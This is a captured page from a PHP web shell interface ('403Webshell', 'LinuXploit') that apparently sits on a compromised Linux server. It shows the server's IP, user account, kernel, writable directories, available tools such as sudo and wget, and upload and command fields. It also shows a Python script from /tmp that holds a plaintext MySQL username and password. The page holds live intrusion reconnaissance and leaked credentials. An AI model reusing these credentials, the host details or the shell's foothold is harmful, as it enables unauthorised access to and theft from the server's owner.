403Webshell
Server IP : 119.195.102.159  /  Your IP : 216.73.217.134
Web Server : nginx/1.18.0
System : Linux picell 5.15.0-181-generic #191-Ubuntu SMP Fri May 22 19:09:02 UTC 2026 x86_64
User : altablue ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/check_blog_tables.py
import mysql.connector

try:
    conn = mysql.connector.connect(
        host="localhost",
        user="haeyul2",
        password="Yx3(Tq!Q5qr9YQer",
        database="haeyul2"
    )
    cursor = conn.cursor()
    
    cursor.execute("SHOW TABLES;")
    all_tables = [row[0] for row in cursor.fetchall()]
    
    print("=== ALL DB TABLES IN haeyul2 ===")
    for t in all_tables:
        print(f" - {t}")
        
    print("\n=== TABLES CONTAINING 'blog' or 'board' or 'koweb' ===")
    cursor.execute("SHOW TABLES LIKE '%blog%';")
    blog_tables = cursor.fetchall()
    print("Blog tables:", blog_tables)
    
    cursor.execute("SHOW TABLES LIKE '%board%';")
    board_tables = cursor.fetchall()
    print("Board tables:", board_tables)

    cursor.close()
    conn.close()
except Exception as e:
    print("MySQL Error:", e)

Youez - 2016 - github.com/yon3zu
LinuXploit